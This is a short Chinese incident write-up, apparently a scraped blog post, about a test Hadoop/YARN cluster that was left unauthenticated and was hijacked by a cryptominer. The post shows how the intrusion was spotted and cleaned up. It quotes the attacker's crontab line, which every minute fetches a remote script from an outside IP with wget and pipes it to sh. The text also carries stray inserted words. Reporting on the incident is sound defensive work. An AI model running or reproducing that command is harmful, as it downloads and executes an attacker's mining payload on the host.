Yarn遭到挖矿病毒攻击
测试环境在阿里云上暴露出了公网端口,前一段时间CDH集群本来是开启了Kerberos认证,可是由于你们反映使用麻烦,因此就又关闭了Kerberos。java
最近几天你们广泛反映测试环境上hive和hdfs job执行很慢,yarn进程的cpu使用率持续在200%以上,通过排除CPU使用率已经连续两天100%且没有降下来,查看job以下服务器
有39个job明细多余开发提交的任务数量,且User来自dr.who,这个以前没有见过,初步判定遭受了攻击,测试
切换到yarn用户下:阿里云
sudo -u yarn crontab -l
显示* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
且在/var/tmp目录下多出了一个java文件
解决办法是关闭掉crontab调度,而且删掉/var/tmp/java文件,从新开启kerberos认证服务器恢复正常
相关文章
- 1. 挖矿病毒
- 2. miner2 挖矿病毒
- 3. 服务器被门罗币挖矿病毒攻击的处理
- 4. 挖矿病毒攻击的排查处置手册
- 5. 门罗币挖矿病毒
- 6. 挖矿病毒 qW3xT.2
- 7. 处理kdevtmpfsi挖矿病毒
- 8. 挖矿病毒排查
- 9. 挖矿病毒清理
- 10. RegretLocker勒索病毒流行,众多公司遭遇该病毒攻击
- 更多相关文章...
- • Rust 输出到命令行 - RUST 教程
- • 数据库涉及到哪些技术? - MySQL教程
- • Docker容器实战(一) - 封神Server端技术
- • 算法总结-回溯法
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 挖矿病毒
- 2. miner2 挖矿病毒
- 3. 服务器被门罗币挖矿病毒攻击的处理
- 4. 挖矿病毒攻击的排查处置手册
- 5. 门罗币挖矿病毒
- 6. 挖矿病毒 qW3xT.2
- 7. 处理kdevtmpfsi挖矿病毒
- 8. 挖矿病毒排查
- 9. 挖矿病毒清理
- 10. RegretLocker勒索病毒流行,众多公司遭遇该病毒攻击